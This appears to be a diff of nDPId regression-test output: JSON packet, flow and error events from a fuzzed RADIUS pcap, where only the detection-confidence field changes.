01282{"packet_event_id":1,"packet_event_name":"packet","packet_id":223,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997781611,"pkt":"AAAMB6xAABRP+4rqCADLAALbISxAAP8RAAAKDEAexuIZNXIQBxQCxwAAAXoCv21LVaoOFlJlDTVaO4Jse+QaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMyNwZbIqfCCTUwMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jrzgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZTAtNWYtNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLXkwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWl2PTEwZmYxMGFjMDAwMDAwYzljMmE3MjI1YiwgNWIyMmE3YzIvZTA6NWY6NDU6OTA6MDk6NWYvMjMyBAasFAEQIA5WWldDMvxlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAA8yESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDhvMk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IR0GAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVASlj6j0uJ92nAXwxDVWGMfUg=="} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":227,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997829855,"flow_last_seen":1528997829855,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997829855,"l3_proto":"ip4","src_ip":"10.12.64.37","dst_ip":"0.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01393{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1528997829855,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997829855,"pkt":"AAAMB6xAABRd+4rqCABFAALbIS5AAP8RAAAKDEAlAOIZNXIQBxQCxwAAAXwCv4IsSQM3nR8wY02\/WtSNjVsaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAF\/ICQlXSVNQUjEwOgkAADghDQMyNwZbIqfFATVRMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vc2dZAxB+CDFjaXNjb4MGAAAAAR8TZTAtNWYtNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzZG9uLWlkPTEwZmYxMGFjMDAwMDAwYzljMmE3MjI1YiwgNWIyMmE3YzIvZTA6NWY6NDU6OTA6MDk6NWYvMjMyBAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgC7AAZRBDU2TzoCAQA4ATAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLkVyZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFahoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgYzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWUgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMeQA4IRQGAAABAhoMAAA4IRUzAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVASDRiCmnK8XecKtcjM1khyyg=="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997829855,"flow_last_seen":1528997829855,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997829855,"l3_proto":"ip4","src_ip":"10.12.64.37","dst_ip":"0.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997829855,"flow_last_seen":1528997829855,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997829855,"l3_proto":"ip4","src_ip":"10.12.64.37","dst_ip":"0.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":231,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997833437,"flow_last_seen":1528997833437,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997833437,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.48.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1528997833437,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997833437,"pkt":"AAAMB6xAABRP+4rqCABFAALbITBAAP8RAAAKDEAexjAZNXIQBxQCxwAAAX4Cv1biH8K0FjYkuY9BaqM1S08aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwiAkAADghDQMzNwZbIqfJATUwMzExNDgwMqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997833437,"flow_last_seen":1528997833437,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997833437,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.48.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997833437,"flow_last_seen":1528997833437,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997833437,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.48.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997833703,"flow_last_seen":1528997833703,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528997833703,"l3_proto":"ip4","src_ip":"198.52.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1528997833703,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1528997833703,"pkt":"ABRP+4rqcNuYVcUnCABFAADABiRAAPwRTcfGNBk1CgxAHgcUchAArG8ZA38ApPpRavVvUwLj8+Vom5Z2csUBNTAzMTE0ODAyODE1MDE1ODlAS2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE3Y1EvZXM6NWY6NDU6OTA6MDk6FWYvMjMyEiIzMjc2NCBTdWJzY3JpYmVyIG5vdCBwcm92aXNpb25lZE8HBAEABwBQEnLsj3tLTX0TFwMzSpwXcJE="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997833703,"flow_last_seen":1528997833703,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528997833703,"l3_proto":"ip4","src_ip":"198.52.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00704{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":235,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":128,"flow_first_seen":1528996068129,"flow_last_seen":1528997833636,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":55818,"flow_avg_l4_payload_len":436,"midstream":0,"thread_ts_msec":1528997833703,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997833703,"flow_last_seen":1528997833703,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528997833703,"l3_proto":"ip4","src_ip":"198.52.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00704{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":235,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":128,"flow_first_seen":1528996068129,"flow_last_seen":1528997833636,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":55818,"flow_avg_l4_payload_len":436,"midstream":0,"thread_ts_msec":1528997833703,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 01391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1528997839248,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997839248,"pkt":"AAAMB6xAABRP+4rqCABFAALbITKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":236,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997839322,"flow_last_seen":1528997839322,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997839322,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1528997839322,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528997839322,"pkt":"ABRP+4rqcNuYVcUnCABFAAClBj5AAPwRTcjG4hk1CgxAHgcVchAAkSN5C4AAiYCfkZP9IDJyM93m2y+NtRUBNTAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0MDAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE3Y2YvYjA6OWY6YmE6NGE6MGU6N2UvMjMzTw4BAAAMFwwAAAwBf\/xQEl7YRWPdxCp7KxkigG7kdUs="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997839322,"flow_last_seen":1528997839322,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997839322,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997839322,"flow_last_seen":1528997839322,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997839322,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00200{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":237,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528997839449} 01219{"packet_event_id":1,"packet_event_name":"packet","packet_id":237,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":697,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":697,"pkt_l4_len":0,"thread_ts_msec":1528997839322,"pkt":"AAAMB6xAVRRP+4qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00197{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":238,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528997839511} 00562{"packet_event_id":1,"packet_event_name":"packet","packet_id":238,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":206,"pkt_l4_len":0,"thread_ts_msec":1528997839322,"pkt":"ABRP+4rqcNuYVcUnCABlAADABkJAAPwRTaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997655528,"flow_last_seen":1528997655528,"flow_idle_time":200000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1528997839322,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997655006,"flow_last_seen":1528997655006,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997839322,"l3_proto":"ip4","src_ip":"37.0.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00702{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1528997654780,"flow_last_seen":1528997660003,"flow_idle_time":200000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":2365,"flow_avg_l4_payload_len":591,"midstream":0,"thread_ts_msec":1528997839322,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997655528,"flow_last_seen":1528997655528,"flow_idle_time":200000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1528997839322,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997655006,"flow_last_seen":1528997655006,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997839322,"l3_proto":"ip4","src_ip":"37.0.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00702{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1528997654780,"flow_last_seen":1528997660003,"flow_idle_time":200000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":2365,"flow_avg_l4_payload_len":591,"midstream":0,"thread_ts_msec":1528997839322,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":240,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997867612,"flow_last_seen":1528997867612,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997867612,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29204,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 